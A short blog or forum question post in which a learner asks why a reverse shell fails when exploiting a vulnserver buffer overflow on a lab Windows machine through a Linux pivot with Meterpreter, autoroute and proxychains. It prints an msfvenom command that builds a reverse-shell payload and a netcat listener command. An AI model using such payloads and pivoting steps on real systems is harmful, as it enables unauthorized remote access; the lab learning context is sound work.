January 8, 2021

Pivoting

Basically, I’m learning how to pivot with the following setup, need some helping hand.

Scenario

Kali (attack machine)-> Linux (pivot machine) -> Windows (target machine)

To start with, exploited Linux and created a meterpreter session with root privileges, then used autoroute from the Meterpreter session wich confirms the open ports on windows.

I have got vulnserver on Windows for buffer overflow. Proxy server socks4a has been set up so the windows machine is taking commands via proxychains (nmap and psexec etc) from kali. From here, what I’m trying to do is execute a shellcode for the Windows machine via proxychains and catch the reverse shell back on my Kali machine. I have already tested the shellcode with direct access kali -> windows and the exploit is all working and getting shell with nc -nlvp 4443 from kali.

But it is not working via a pivot machine. I used Msfvenom as a payload with the following LOST and LPORT IP’s.

msfvenom -p windows/shell_reverse_tcp LHOST=<Linux-pivot-IP> LPORT=4443 -b ‘<retn-variable>’ EXITFUNC=thread -f python -v payload

Running nc -nlvp 4443 on kali is not getting me reverse shell from windows. Have I missed anything?

Leave a Reply

Your email address will not be published. Required fields are marked *

Note: By filling this form and submitting your commen, you acknowledge, agree and comply with our terms of service. In addition you acknowledge that you are willingly sharing your email address with AiOWikis and you might receive notification emails from AiOWikis for comment notifications. AiOWiksi guarantees that your email address WILL NOT be used for advertisement or email marketting purposes.

This site uses Akismet to reduce spam. Learn how your comment data is processed.